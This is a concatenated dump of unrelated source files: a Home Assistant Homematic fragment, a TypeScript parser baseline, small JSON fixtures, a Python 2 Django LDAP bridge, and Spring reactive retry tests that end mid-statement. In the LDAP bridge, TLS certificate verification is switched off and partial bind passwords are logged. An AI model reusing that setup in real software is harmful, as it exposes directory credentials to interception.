for node, data in HM_ATTRIBUTE_SUPPORT.items():
# Is an attributes and exists for this object
if node in self._data:
value = data[1].get(self._data[node], self._data[node])
attr[data[0]] = value
# static attributes
attr['id'] = self._hmdevice.ADDRESS
attr['proxy'] = self._proxy
return attr
def link_homematic(self):
"""Connect to Homematic."""
# device is already linked
if self._connected:
return True
# Init
self._hmdevice = self._homematic.devices[self._proxy][self._address]
self._connected = True
# Check if Homematic class is okay for HA class
_LOGGER.info("Start linking %s to %s", self._address, self._name)
try:
# Init datapoints of this object
self._init_data()
if self.hass.data[DATA_DELAY]:
# We delay / pause loading of data to avoid overloading
# of CCU / Homegear when doing auto detection
time.sleep(self.hass.data[DATA_DELAY])
self._load_data_from_hm()
_LOGGER.debug("%s datastruct: %s", self._name, str(self._data))
# Link events from pyhomatic
self._subscribe_homematic_events()
self._available = not self._hmdevice.UNREACH
_LOGGER.debug("%s linking done", self._name)
# pylint: disable=broad-except
except Exception as err:
self._connected = False
_LOGGER.error("Exception while linking %s: %s",
self._address, str(err))
def _hm_event_callback(self, device, caller, attribute, value):
"""Handle all pyhomematic device events."""
_LOGGER.debug("%s received event '%s' value: %s", self._name,
attribute, value)
have_change = False
# Is data needed for this instance?
if attribute in self._data:
# Did data change?
if self._data[attribute] != value:
self._data[attribute] = value
have_change = True
# If available it has changed
if attribute == 'UNREACH':
self._available = bool(value)
have_change = True
# If it has changed data point, update HA
if have_change:
_LOGGER.debug("%s update_ha_state after '%s'", self._name,
attribute)
self.schedule_update_ha_state()
def _subscribe_homematic_events(self):
"""Subscribe all required events to handle job."""
channels_to_sub = {0: True} # add channel 0 for UNREACH
# Push data to channels_to_sub from hmdevice metadata
for metadata in (self._hmdevice.SENSORNODE, self._hmdevice.BINARYNODE,
self._hmdevice.ATTRIBUTENODE,
self._hmdevice.WRITENODE, self._hmdevice.EVENTNODE,
self._hmdevice.ACTIONNODE):
for node, channels in metadata.items():
# Data is needed for this instance
if node in self._data:
# chan is current channel
if len(channels) == 1:
channel = channels[0]
else:
channel = self._channel
# Prepare for subscription
try:
if int(channel) >= 0:
channels_to_sub.update({int(channel): True})
except (ValueError, TypeError):
_LOGGER.error("Invalid channel in metadata from %s",
self._name)
# Set callbacks
for channel in channels_to_sub:
_LOGGER.debug(
"Subscribe channel %d from %s", channel, self._name)
self._hmdevice.setEventCallback(
callback=self._hm_event_callback, bequeath=False,
channel=channel)
def _load_data_from_hm(self):
"""Load first value from pyhomematic."""
if not self._connected:
return False
# Read data from pyhomematic
for metadata, funct in (
(self._hmdevice.ATTRIBUTENODE,
self._hmdevice.getAttributeData),
(self._hmdevice.WRITENODE, self._hmdevice.getWriteData),
(self._hmdevice.SENSORNODE, self._hmdevice.getSensorData),
(self._hmdevice.BINARYNODE, self._hmdevice.getBinaryData)):
for node in metadata:
if metadata[node] and node in self._data:
self._data[node] = funct(name=node, channel=self._channel)
return True
def _hm_set_state(self, value):
"""Set data to main datapoint."""
if self._state in self._data:
self._data[self._state] = value
def _hm_get_state(self):
"""Get data from main datapoint."""
if self._state in self._data:
return self._data[self._state]
return None
def _init_data(self):
"""Generate a data dict (self._data) from the Homematic metadata."""
# Add all attributes to data dict
for data_note in self._hmdevice.ATTRIBUTENODE:
self._data.update({data_note: STATE_UNKNOWN})
# init device specified data
self._init_data_struct()
def _init_data_struct(self):
"""Generate a data dict from the Homematic device metadata."""
raise NotImplementedError | unknown | codeparrot/codeparrot-clean | ||
//// [tests/cases/conformance/internalModules/moduleDeclarations/asiPreventsParsingAsNamespace04.ts] ////
//// [asiPreventsParsingAsNamespace04.ts]
let module = 10;
module in {}
//// [asiPreventsParsingAsNamespace04.js]
"use strict";
let module = 10;
module in {}; | javascript | github | https://github.com/microsoft/TypeScript | tests/baselines/reference/asiPreventsParsingAsNamespace04.js |
{
"name": "big-module-with-flag",
"sideEffects": false
} | json | github | https://github.com/webpack/webpack | examples/side-effects/node_modules/big-module-with-flag/package.json |
{
"private": true,
"scripts": {
"dev": "next dev",
"build": "next build",
"start": "next start"
},
"dependencies": {
"next": "latest",
"next-translate": "2.5.3",
"react": "18.2.0",
"react-dom": "18.2.0"
},
"devDependencies": {
"next-translate-plugin": "2.5.3"
}
} | json | github | https://github.com/vercel/next.js | examples/with-next-translate/package.json |
{
"type": "function",
"name": "method",
"class": "Symfony\\Bundle\\FrameworkBundle\\Tests\\Console\\Descriptor\\CallableClass"
} | json | github | https://github.com/symfony/symfony | src/Symfony/Bundle/FrameworkBundle/Tests/Fixtures/Descriptor/callable_3.json |
#encoding=utf8
from django.db import models
from django.conf import settings
from django.utils.dateformat import format
from django.core.exceptions import ObjectDoesNotExist
import logging, json, time, copy
import ldap
from ldap import modlist
from datetime import datetime
from pprint import pprint as pp
from fum.common.util import to_json, ldap_log
log = logging.getLogger(__name__)
TOTAL_CONNECTIONS = 0
from ldappool import ConnectionManager
cm = ConnectionManager(
uri=settings.LDAP_CONNECTION.get('uri'),
use_tls=settings.USE_TLS,
)
def open_ldap(bind_dn=None, bind_pwd=None):
return LDAPBridge(parent=None, BIND_DN=bind_dn, BIND_PASSWORD=bind_pwd)
def fetch(self, dn, filters='', attrs=[], scope=ldap.SCOPE_BASE, connection=None):
specials = []
normals = []
for a in attrs:
if isinstance(a, tuple):
specials.append(a)
else:
normals.append(a)
result = connection.search_s(dn, scope, filters, normals)[0][1]
for s in specials:
res = connection.search_s('cn=%s,%s'%(result['cn'],s[0]), scope, filters, [s[1]])
if len(res) > 0:
result[s[1]] = res[0][1][s[1]+"s"]
else:
result[s[1]] = []
return result
def test_user_ldap(username, password):
'''
Test that user has access to ldap with given credentials.
Returns true or false
'''
from fum.models import Users
if username and password:
user = Users.objects.get(username=username)
try:
# throws an exception if the password is incorrect
LDAPBridge(parent=user, BIND_DN=user.get_dn(),
BIND_PASSWORD=password).connection
return True
except Exception, e:
print "ERROR#helpers: %s, %s"%(username,e)
return False
class AttrDict(dict):
def __init__(self, *args, **kwargs):
super(AttrDict, self).__init__(*args, **kwargs)
self.__dict__ = self
class LDAPBridge(object):
""" In LDAP there are Users, Groups, Servers, Projects. Users can be part of the others as uniqueMember MultiValueFields. """
def __init__(self, parent, dn=None, **kwargs):
"""
The class is instantiated with the parent object (DN) that we want to work against in LDAP
"""
self._connection = None
self._connection_bound = False
self.settings = AttrDict()
self.settings.uri = kwargs.get('uri', settings.LDAP_CONNECTION.get('uri'))
self.settings.START_TLS = True
self.settings.CONNECTION_OPTIONS = kwargs.get('LDAP_CONNECTION_OPTIONS', None) or settings.LDAP_CONNECTION_OPTIONS
self.settings.BIND_DN = kwargs.get('BIND_DN', None) or settings.LDAP_CONNECTION.get('bind_dn')
self.settings.BIND_PASSWORD = kwargs.get('BIND_PASSWORD', None) or settings.LDAP_CONNECTION.get('bind_pwd')
self.ldap = ldap
self.parent_instance = parent
self.dn = None
self.creating = False
if self.parent_instance:
self.creating = False if self.parent_instance.pk else True
self.dn = self.parent_instance.get_dn()
def fetch(self, dn, filters='(objectClass=*)', attrs=None, scope=ldap.SCOPE_BASE):
result = self.op_search(dn, scope, filters, attrs)
if scope == ldap.SCOPE_BASE:
return result[0][1]
return result
#
# LDAP connection
#
def _bind(self):
self._bind_as(self.settings.BIND_DN,
self.settings.BIND_PASSWORD,
sticky=True)
def _bind_as(self, bind_dn, bind_password, sticky=False, retry_number=0):
try:
self._get_connection().simple_bind_s(bind_dn.encode('utf-8'), bind_password.encode('utf-8'))
except ldap.SERVER_DOWN, e:
if retry_number == 0:
self._connection = None
return self._bind_as(bind_dn=bind_dn, bind_password=bind_password, sticky=sticky, retry_number=1)
self._connection_bound = sticky
def _get_connection(self):
global TOTAL_CONNECTIONS
if self._connection is None:
TOTAL_CONNECTIONS += 1
log.debug("Opening LDAP connection (%s) [%s/%s] :: %s"%(self.settings.uri,
self.settings.BIND_DN,
self.settings.BIND_PASSWORD[:2]+'****',
TOTAL_CONNECTIONS))
self._connection = self.ldap.initialize(
uri=self.settings.uri,
trace_level=settings.LDAP_TRACE_LEVEL)
for opt, value in self.settings.CONNECTION_OPTIONS.iteritems():
self._connection.set_option(opt, value)
if self.settings.START_TLS:
ldap.set_option(ldap.OPT_X_TLS_REQUIRE_CERT, 0)
self._connection = self.ldap.initialize(self.settings.uri, trace_level=settings.LDAP_TRACE_LEVEL)
self._connection.start_tls_s()
return self._connection
def _get_bound_connection(self):
if not self._connection_bound:
self._bind()
return self._get_connection()
connection = property(_get_bound_connection)
def get_modify_modlist(self, values, force_update=False):
""" Empty values are not seen as changes due comparing to {};
when (empty key values) found, manually added as changed"""
current_values = {}
mlist = modlist.modifyModlist(current_values, values)
mlist_keys = [k[1] for k in mlist]
for k, m in enumerate(values.keys()):
if m not in mlist_keys:
mlist.append((ldap.MOD_REPLACE, m, None))
for k, m in enumerate(mlist):
mlist[k] = (ldap.MOD_REPLACE, mlist[k][1], mlist[k][2])
return mlist
def get_add_modlist(self, values):
return modlist.addModlist(values)
def needs_saving(self, modified_values={}):
return (self.creating or len(modified_values) > 0)
#
# LDAP operations abstraction
#
#
def op_add(self, dn, mlist):
self.connection.add_s(dn, mlist)
def op_modify(self, dn, mlist):
self.connection.modify_s(dn, mlist)
def op_modify_ext(self, dn, mlist):
self.connection.modify_ext_s(dn, mlist)
def op_delete(self, dn):
return self.connection.delete_s(dn)
def op_search(self, dn, scope, filters, attrs):
return self.connection.search_s(dn, scope, filters, attrs)
#
#
#
#
def create(self, dn=None, values={}, extra={}):
modified_values = self.model_fields_to_ldap_fields(values, extra, mode='create')
mlist = self.get_add_modlist(modified_values)
if not self.needs_saving(modified_values):
log.debug("LDAP: No create required: %s"%self.dn)
return
log.debug("LDAP.create %s :: %s"%(self.dn, ldap_log(mlist)))
# TODO: check for duplicates in objectClass
if dn:
create_dn=dn
elif self.dn:
create_dn=dn
else:
raise Exception("No DN specified, unable to save to LDAP.")
self.op_add(create_dn, mlist)
def save(self, values={}, extra={}, **kwargs):
modified_values = self.model_fields_to_ldap_fields(values, extra, mode='save')
self.kwargs = kwargs
force_update = kwargs.get('force_update', False)
mlist = self.get_modify_modlist(modified_values, force_update=force_update)
if not self.needs_saving(modified_values):
log.debug("LDAP: No save required: %s"%self.dn)
return
if mlist:
log.debug("LDAP.save %s :: %s"%(self.dn, ldap_log(mlist)))
self.op_modify(self.dn, mlist)
def delete(self, dn=None):
dn = dn or self.dn
log.debug("LDAP.delete %s"%(dn))
return self.op_delete(dn)
def create_raw(self, dn, mlist):
log.debug("LDAP.create_raw %s"%dn)
self.op_add(dn, mlist)
def save_raw(self, dn, mlist):
log.debug("LDAP.save_raw %s"%dn)
self.op_modify(dn, mlist)
def save_ext_raw(self, dn, mlist):
log.debug("LDAP.save_ext_raw %s"%dn)
self.op_modify_ext(dn, mlist)
#
#
# ManyToMany relations
#
#
def save_relation(self, parent, child, field):
""" a relation, represented as DN, exists or it does not, it is not modified in-place """
dn = field.get_dn(parent, child)
values = self.prepare_related_values(parent, child, field)
mlist = [(ldap.MOD_ADD, field.ldap_field, values)]
log.debug("LDAP.save_relation %s :: %s"%(dn, ldap_log(mlist)))
self.op_modify_ext(dn, mlist)
def delete_relation(self, parent, child, field):
dn = field.get_dn(parent, child)
values = self.prepare_related_values(parent, child, field)
mlist = [(ldap.MOD_DELETE, field.ldap_field, values)]
log.debug("LDAP.delete_relation %s :: %s"%(self.dn, ldap_log(mlist)))
self.op_modify_ext(dn, mlist)
def replace_relation(self, parent, child, field):
dn = field.get_dn(parent, child)
values = self.prepare_related_values(parent, child, field)
mlist = [(ldap.MOD_REPLACE, field.ldap_field, values)]
log.debug("LDAP.replace_relation %s :: %s"%(dn, ldap_log(mlist)))
self.op_modify_ext(dn, mlist)
def prepare_related_values(self, parent, child, field):
""" relations are a represented as MultiValueFields
instance values are returned as get_dn(), but this is true only for User
- need to use ManyFields.get_dn()
"""
if isinstance(child, models.Model):
values = [field.as_value(parent, child)]
elif isinstance(child, basestring):
values = [child.encode('utf-8')]
elif isinstance(child, list):
pass
else:
raise Exception("Values must be a model instance, string or list")
return values
#
#
# OLD vs NEW
#
#
def get_ldap_fields(self):
ldap_fields = copy.deepcopy(self.parent_instance.ldap_fields)
ldap_only_fields = copy.deepcopy(self.parent_instance.ldap_only_fields)
ldap_fields.update(ldap_only_fields)
return ldap_fields
def model_fields_to_ldap_fields(self, values={}, extra={}, mode=''):
a = {}
changes = values
for field, ldap_field in self.get_ldap_fields().iteritems():
attr = getattr(self.parent_instance, field, '')
if callable(attr):
if mode == 'create':
# cn required on create
if changes:
a.update(self.as_ldap_value(field, attr()))
else:
if changes.has_key(field):
a.update(self.as_ldap_value(field, attr()))
else:
if changes.has_key(field):
a.update(self.as_ldap_value(field, changes[field]['new']))
a.update(extra)
return a
def as_ldap_value(self, field, value):
ldap_fields = self.get_ldap_fields()
if isinstance(ldap_fields[field], list):
fields = ldap_fields[field]
else:
fields = [ldap_fields[field]]
ldap_values = {}
for f in fields:
ldap_values[f] = to_ldap_value(value)
return ldap_values
class DummyLdap(LDAPBridge):
def delete(self, *a, **kw):
log.debug("DummyLDAP.delete %s :: %s"%(self.dn, datetime.now()))
def save(self, *a, **kw):
log.debug("DummyLDAP.save %s :: %s"%(self.dn, datetime.now()))
def create(self, *a, **kw):
log.debug("DummyLDAP.create %s :: %s "%(self.dn, datetime.now()))
def save_relation(self, *a, **kw):
log.debug("DummyLDAP.save_relation %s :: %s "%(self.dn, datetime.now()))
def replace_relation(self, *a, **kw):
log.debug("DummyLDAP.replace_relation %s :: %s "%(self.dn, datetime.now()))
def delete_relation(self, *a, **kw):
log.debug("DummyLDAP.delete_relation %s :: %s "%(self.dn, datetime.now()))
def create_raw(self, dn, mlist):
log.debug("DummyLDAP.create_raw %s"%dn)
def save_raw(self, dn, mlist):
log.debug("DummyLDAP.save_raw %s"%dn)
class ReconnectingLDAPBridge(LDAPBridge):
def __init__(self, parent, dn=None, **kwargs):
super(ReconnectingLDAPBridge, self).__init__(parent, dn, **kwargs)
self.ldap_class = ldap.ldapobject.ReconnectLDAPObject
self.ldap_options = dict(
uri=self.settings.uri,
trace_level=settings.LDAP_TRACE_LEVEL,
retry_max=settings.LDAP_RETRY_MAX,
retry_delay=settings.LDAP_RETRY_DELAY,
)
def get_ldap_class(self):
return self.ldap_class(**self.ldap_options)
def _bind_as(self, bind_dn, bind_password, sticky=False, retry_number=0):
try:
self._get_connection().simple_bind_s(bind_dn.encode('utf-8'), bind_password.encode('utf-8'))
except ldap.SERVER_DOWN, e:
if retry_number == 0:
self._connection = None
return self._bind_as(bind_dn=bind_dn, bind_password=bind_password, sticky=sticky, retry_number=1)
self._connection_bound = sticky
def _get_bound_connection(self):
if not self._connection: # _connection_bound irrelevant
self._bind()
return self._get_connection()
def _get_connection(self):
if self._connection is None:
log.debug("Opening LDAP connection (%s)"%(self.settings.uri))
self._connection = self.get_ldap_class()
for opt, value in self.settings.CONNECTION_OPTIONS.iteritems():
self._connection.set_option(opt, value)
if self.settings.START_TLS:
self._connection.set_option(ldap.OPT_X_TLS_REQUIRE_CERT, 0)
self._connection.start_tls_s()
return self._connection
class PoolLDAPBridge(LDAPBridge):
def op_add(self, dn, mlist):
with self.connection as c:
c.add_s(dn, mlist)
def op_modify(self, dn, mlist):
with self.connection as c:
c.modify_s(dn, mlist)
def op_modify_ext(self, dn, mlist):
with self.connection as c:
c.modify_ext_s(dn, mlist)
def op_delete(self, dn):
with self.connection as c:
return c.delete_s(dn)
def op_search(self, dn, scope, filters, attrs):
with self.connection as c:
return c.search_s(dn, scope, filters, attrs)
def _get_bound_connection(self):
return cm.connection(self.settings.BIND_DN, self.settings.BIND_PASSWORD)
connection = property(_get_bound_connection)
def to_ldap_value(attr):
if attr is None:
return ''
elif isinstance(attr, datetime):
return format(attr, 'U').encode('utf8')
elif isinstance(attr, unicode):
return attr.encode('utf8')
elif isinstance(attr, int):
return str(attr)
else:
return attr
def my_import(name):
mod = __import__(name)
components = name.split('.')
for comp in components[1:]:
mod = getattr(mod, comp)
return mod
cls_lookup_table = {}
def ldap_cls(*args, **kwargs):
ldap_cls = kwargs.pop('LDAP_CLASS', None) or settings.LDAP_CLASS
if ldap_cls in cls_lookup_table:
cls = cls_lookup_table[ldap_cls]
else:
ldap_cls_modules = ldap_cls.split('.')
m = '.'.join(ldap_cls_modules[:-1])
module = my_import(m)
cls = getattr(module, ldap_cls_modules[-1])
cls_lookup_table[ldap_cls] = cls
return cls(*args, **kwargs) | unknown | codeparrot/codeparrot-clean | ||
/*
* Copyright 2002-present the original author or authors.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* https://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.springframework.resilience;
import java.io.IOException;
import java.lang.reflect.Method;
import java.nio.charset.MalformedInputException;
import java.nio.file.AccessDeniedException;
import java.nio.file.FileSystemException;
import java.time.Duration;
import java.util.concurrent.TimeoutException;
import java.util.concurrent.atomic.AtomicInteger;
import org.assertj.core.api.ThrowingConsumer;
import org.junit.jupiter.api.Nested;
import org.junit.jupiter.api.Test;
import reactor.core.Exceptions;
import reactor.core.publisher.Flux;
import reactor.core.publisher.Mono;
import org.springframework.aop.framework.AopProxyUtils;
import org.springframework.aop.framework.ProxyFactory;
import org.springframework.beans.factory.BeanFactory;
import org.springframework.beans.factory.support.RootBeanDefinition;
import org.springframework.context.annotation.AnnotationConfigApplicationContext;
import org.springframework.context.support.GenericApplicationContext;
import org.springframework.resilience.annotation.EnableResilientMethods;
import org.springframework.resilience.annotation.RetryAnnotationBeanPostProcessor;
import org.springframework.resilience.annotation.Retryable;
import org.springframework.resilience.retry.MethodRetrySpec;
import org.springframework.resilience.retry.SimpleRetryInterceptor;
import static org.assertj.core.api.Assertions.assertThat;
import static org.assertj.core.api.Assertions.assertThatExceptionOfType;
import static org.assertj.core.api.Assertions.assertThatIllegalStateException;
import static org.assertj.core.api.Assertions.assertThatNoException;
import static org.assertj.core.api.Assertions.assertThatRuntimeException;
/**
* @author Juergen Hoeller
* @author Sam Brannen
* @since 7.0
*/
class ReactiveRetryInterceptorTests {
@Test
void withSimpleInterceptor() {
NonAnnotatedBean target = new NonAnnotatedBean();
ProxyFactory pf = new ProxyFactory();
pf.setTarget(target);
pf.addAdvice(new SimpleRetryInterceptor(
new MethodRetrySpec((m, t) -> true, 5, Duration.ofMillis(10))));
NonAnnotatedBean proxy = (NonAnnotatedBean) pf.getProxy();
assertThatIllegalStateException()
.isThrownBy(() -> proxy.retryOperation().block())
.satisfies(isRetryExhaustedException())
.havingCause()
.isInstanceOf(IOException.class)
.withMessage("6");
assertThat(target.counter).hasValue(6);
}
@Test
void withPostProcessorForMethod() {
AnnotatedMethodBean proxy = getProxiedAnnotatedMethodBean();
AnnotatedMethodBean target = (AnnotatedMethodBean) AopProxyUtils.getSingletonTarget(proxy);
assertThatIllegalStateException()
.isThrownBy(() -> proxy.retryOperation().block())
.satisfies(isRetryExhaustedException())
.havingCause()
.isInstanceOf(IOException.class)
.withMessage("6");
assertThat(target.counter).hasValue(6);
}
@Test
void withPostProcessorForClassWithExactIncludesMatch() {
AnnotatedClassBean proxy = getProxiedAnnotatedClassBean();
AnnotatedClassBean target = (AnnotatedClassBean) AopProxyUtils.getSingletonTarget(proxy);
// Exact includes match: IOException
assertThatRuntimeException()
.isThrownBy(() -> proxy.ioOperation().block())
// Does NOT throw a RetryExhaustedException, because RejectMalformedInputException3Predicate
// rejects a retry if the last exception was a MalformedInputException with message "3".
.satisfies(isReactiveException())
.havingCause()
.isInstanceOf(MalformedInputException.class)
.withMessageContaining("3");
// 3 = 1 initial invocation + 2 retry attempts
// Not 3 retry attempts, because RejectMalformedInputException3Predicate rejects
// a retry if the last exception was a MalformedInputException with message "3".
assertThat(target.counter).hasValue(3);
}
@Test
void withPostProcessorForClassWithSubtypeIncludesMatch() {
AnnotatedClassBean proxy = getProxiedAnnotatedClassBean();
AnnotatedClassBean target = (AnnotatedClassBean) AopProxyUtils.getSingletonTarget(proxy);
// Subtype includes match: FileSystemException
assertThatRuntimeException()
.isThrownBy(() -> proxy.fileSystemOperation().block())
.satisfies(isRetryExhaustedException())
.withCauseInstanceOf(FileSystemException.class);
// 1 initial attempt + 3 retries
assertThat(target.counter).hasValue(4);
}
@Test // gh-35583
void withPostProcessorForClassWithCauseIncludesMatch() {
AnnotatedClassBean proxy = getProxiedAnnotatedClassBean();
AnnotatedClassBean target = (AnnotatedClassBean) AopProxyUtils.getSingletonTarget(proxy);
// Subtype includes match: FileSystemException
assertThatRuntimeException()
.isThrownBy(() -> proxy.fileSystemOperationWithNestedException().block())
.satisfies(isRetryExhaustedException())
.havingCause()
.isExactlyInstanceOf(RuntimeException.class)
.withCauseExactlyInstanceOf(FileSystemException.class);
// 1 initial attempt + 3 retries
assertThat(target.counter).hasValue(4);
}
@Test
void withPostProcessorForClassWithExcludesMatch() {
AnnotatedClassBean proxy = getProxiedAnnotatedClassBean();
AnnotatedClassBean target = (AnnotatedClassBean) AopProxyUtils.getSingletonTarget(proxy);
// Exact excludes match: AccessDeniedException is listed in the
// class-level excludes, so no retry is attempted.
assertThatRuntimeException()
.isThrownBy(() -> proxy.accessOperation().block())
// Does NOT throw a RetryExhaustedException, because no retry is
// performed for an AccessDeniedException.
.satisfies(isReactiveException())
.withCauseInstanceOf(AccessDeniedException.class);
// 1 initial attempt + 0 retries
assertThat(target.counter).hasValue(1);
}
@Test
void withPostProcessorForClassWithIncludesMismatch() {
AnnotatedClassBean proxy = getProxiedAnnotatedClassBean();
AnnotatedClassBean target = (AnnotatedClassBean) AopProxyUtils.getSingletonTarget(proxy);
// No match: ArithmeticException
//
// Does NOT throw a RetryExhaustedException because no retry is performed
// for an ArithmeticException, since it is not an IOException.
// Does NOT throw a ReactiveException because ArithmeticException is a
// RuntimeException, which reactor.core.Exceptions.propagate(Throwable)
// does not wrap.
assertThatExceptionOfType(ArithmeticException.class)
.isThrownBy(() -> proxy.arithmeticOperation().block())
.withMessage("1");
// 1 initial attempt + 0 retries
assertThat(target.counter).hasValue(1);
}
@Test
void withPostProcessorForClassWithMethodLevelOverride() {
AnnotatedClassBean proxy = getProxiedAnnotatedClassBean();
AnnotatedClassBean target = (AnnotatedClassBean) AopProxyUtils.getSingletonTarget(proxy);
// Overridden, local @Retryable declaration: overrideOperation() declares
// maxRetries = 1 and includes = IOException, superseding the class-level config.
assertThatIllegalStateException()
.isThrownBy(() -> proxy.overrideOperation().blockFirst())
.satisfies(isRetryExhaustedException())
.withCauseInstanceOf(IOException.class);
// 1 initial attempt + 1 retry
assertThat(target.counter).hasValue(2);
}
@Test
void withMethodRetryEventListener() throws Exception {
AnnotationConfigApplicationContext ctx = new AnnotationConfigApplicationContext();
ctx.registerBeanDefinition("bean", new RootBeanDefinition(AnnotatedMethodBean.class));
ctx.registerBeanDefinition("config", new RootBeanDefinition(EnablingConfig.class));
MethodRetryEventListener listener = new MethodRetryEventListener();
ctx.addApplicationListener(listener);
ctx.refresh();
AnnotatedMethodBean proxy = ctx.getBean(AnnotatedMethodBean.class);
AnnotatedMethodBean target = (AnnotatedMethodBean) AopProxyUtils.getSingletonTarget(proxy);
Method method1 = AnnotatedMethodBean.class.getMethod("retryOperation");
// Scenario 1: every attempt fails -> 6 invocations (1 + 5 retries),
// 6 per-failure events plus 1 final retry-aborted event.
assertThatIllegalStateException()
.isThrownBy(() -> proxy.retryOperation().block())
.satisfies(isRetryExhaustedException());
assertThat(target.counter).hasValue(6);
assertThat(listener.events).hasSize(7);
for (int i = 0; i < 6; i++) {
String msg = Integer.toString(i + 1);
assertThat(listener.events.get(i))
.satisfies(event -> assertThat(event.getMethod()).isEqualTo(method1))
.satisfies(event -> assertThat(event.getFailure()).hasMessage(msg).isInstanceOf(IOException.class))
.satisfies(event -> assertThat(event.isRetryAborted()).isFalse());
}
assertThat(listener.events.get(6))
.satisfies(event -> assertThat(event.getMethod()).isEqualTo(method1))
.satisfies(event -> assertThat(event.getFailure()).satisfies(isRetryExhaustedException()))
.satisfies(event -> assertThat(event.isRetryAborted()).isTrue());
listener.events.clear();
target.counter.set(0);
// Scenario 2: immediate success -> no retry events at all.
assertThatNoException().isThrownBy(() -> proxy.retryOperationWithInitialSuccess().block());
assertThat(target.counter).hasValue(1);
assertThat(listener.events).isEmpty();
target.counter.set(0);
// Scenario 3: one failure then success -> exactly one event for the failed attempt.
Method method2 = AnnotatedMethodBean.class.getMethod("retryOperationWithSuccessAfterInitialFailure");
assertThatNoException().isThrownBy(() -> proxy.retryOperationWithSuccessAfterInitialFailure().block());
assertThat(target.counter).hasValue(2);
assertThat(listener.events).hasSize(1);
assertThat(listener.events.get(0))
.satisfies(event -> assertThat(event.getMethod()).isEqualTo(method2))
.satisfies(event -> assertThat(event.getFailure()).hasMessage("1").isInstanceOf(IOException.class))
.satisfies(event -> assertThat(event.isRetryAborted()).isFalse());
}
@Test
void adaptReactiveResultWithMinimalRetrySpec() {
// Test minimal retry configuration: maxRetries=1, delay=0, jitter=0, multiplier=1.0, maxDelay=0
MinimalRetryBean target = new MinimalRetryBean();
ProxyFactory pf = new ProxyFactory();
pf.setTarget(target);
pf.addAdvice(new SimpleRetryInterceptor(
new MethodRetrySpec((m, t) -> true, 1, Duration.ZERO, Duration.ZERO, 1.0, Duration.ZERO)));
MinimalRetryBean proxy = (MinimalRetryBean) pf.getProxy();
// Should execute only 2 times, because maxRetries=1 means 1 call + 1 retry
assertThatIllegalStateException()
.isThrownBy(() -> proxy.retryOperation().block())
.satisfies(isRetryExhaustedException())
.havingCause()
.isInstanceOf(IOException.class)
.withMessage("2");
assertThat(target.counter).hasValue(2);
}
@Test
void adaptReactiveResultWithZeroAttempts() {
// Test boundary retry configuration: maxRetries=0, delay=0, jitter=0, multiplier=1.0, maxDelay=0
MinimalRetryBean target = new MinimalRetryBean();
ProxyFactory pf = new ProxyFactory();
pf.setTarget(target);
pf.addAdvice(new SimpleRetryInterceptor(
new MethodRetrySpec((m, t) -> true, 0, Duration.ZERO, Duration.ZERO, 1.0, Duration.ZERO)));
MinimalRetryBean proxy = (MinimalRetryBean) pf.getProxy();
// Should execute only 1 time, because maxRetries=0 means initial call only
assertThatIllegalStateException()
.isThrownBy(() -> proxy.retryOperation().block())
.satisfies(isRetryExhaustedException())
.havingCause()
.isInstanceOf(IOException.class)
.withMessage("1");
assertThat(target.counter).hasValue(1);
}
@Test
void adaptReactiveResultWithZeroDelayAndJitter() {
// Test case where delay=0 and jitter>0
ZeroDelayJitterBean target = new ZeroDelayJitterBean();
ProxyFactory pf = new ProxyFactory();
pf.setTarget(target);
pf.addAdvice(new SimpleRetryInterceptor(
new MethodRetrySpec((m, t) -> true, 3, Duration.ZERO, Duration.ofMillis(10), 2.0, Duration.ofMillis(100))));
ZeroDelayJitterBean proxy = (ZeroDelayJitterBean) pf.getProxy();
// Retries must still be exhausted normally: 1 initial attempt + 3 retries.
assertThatIllegalStateException()
.isThrownBy(() -> proxy.retryOperation().block())
.satisfies(isRetryExhaustedException())
.havingCause()
.isInstanceOf(IOException.class)
.withMessage("4");
assertThat(target.counter).hasValue(4);
}
@Test
void adaptReactiveResultWithJitterGreaterThanDelay() {
// Test case where jitter > delay
JitterGreaterThanDelayBean target = new JitterGreaterThanDelayBean();
ProxyFactory pf = new ProxyFactory();
pf.setTarget(target);
pf.addAdvice(new SimpleRetryInterceptor(
new MethodRetrySpec((m, t) -> true, 3, Duration.ofMillis(5), Duration.ofMillis(20), 1.5, Duration.ofMillis(50))));
JitterGreaterThanDelayBean proxy = (JitterGreaterThanDelayBean) pf.getProxy();
// Retries must still be exhausted normally: 1 initial attempt + 3 retries.
assertThatIllegalStateException()
.isThrownBy(() -> proxy.retryOperation().block())
.satisfies(isRetryExhaustedException())
.havingCause()
.isInstanceOf(IOException.class)
.withMessage("4");
assertThat(target.counter).hasValue(4);
}
@Test
void adaptReactiveResultWithFluxMultiValue() {
// Test Flux multi-value stream case
FluxMultiValueBean target = new FluxMultiValueBean();
ProxyFactory pf = new ProxyFactory();
pf.setTarget(target);
pf.addAdvice(new SimpleRetryInterceptor(
new MethodRetrySpec((m, t) -> true, 3, Duration.ofMillis(10), Duration.ofMillis(5), 2.0, Duration.ofMillis(100))));
FluxMultiValueBean proxy = (FluxMultiValueBean) pf.getProxy();
// blockFirst() subscribes to the Flux; 1 initial attempt + 3 retries.
assertThatIllegalStateException()
.isThrownBy(() -> proxy.retryOperation().blockFirst())
.satisfies(isRetryExhaustedException())
.havingCause()
.isInstanceOf(IOException.class)
.withMessage("4");
assertThat(target.counter).hasValue(4);
}
@Test
void adaptReactiveResultWithSuccessfulOperation() {
// Test successful return case, ensuring retry mechanism doesn't activate
SuccessfulOperationBean target = new SuccessfulOperationBean();
ProxyFactory pf = new ProxyFactory();
pf.setTarget(target);
pf.addAdvice(new SimpleRetryInterceptor(
new MethodRetrySpec((m, t) -> true, 5, Duration.ofMillis(10), Duration.ofMillis(5), 2.0, Duration.ofMillis(100))));
SuccessfulOperationBean proxy = (SuccessfulOperationBean) pf.getProxy();
String result = proxy.retryOperation().block();
assertThat(result).isEqualTo("success");
// Should execute only once because of successful return
assertThat(target.counter).hasValue(1);
}
@Test
void adaptReactiveResultWithAlwaysFailingOperation() {
// Test "always fails" case, ensuring retry mechanism stops after maxRetries (3)
AlwaysFailsBean target = new AlwaysFailsBean();
ProxyFactory pf = new ProxyFactory();
pf.setTarget(target);
pf.addAdvice(new SimpleRetryInterceptor(
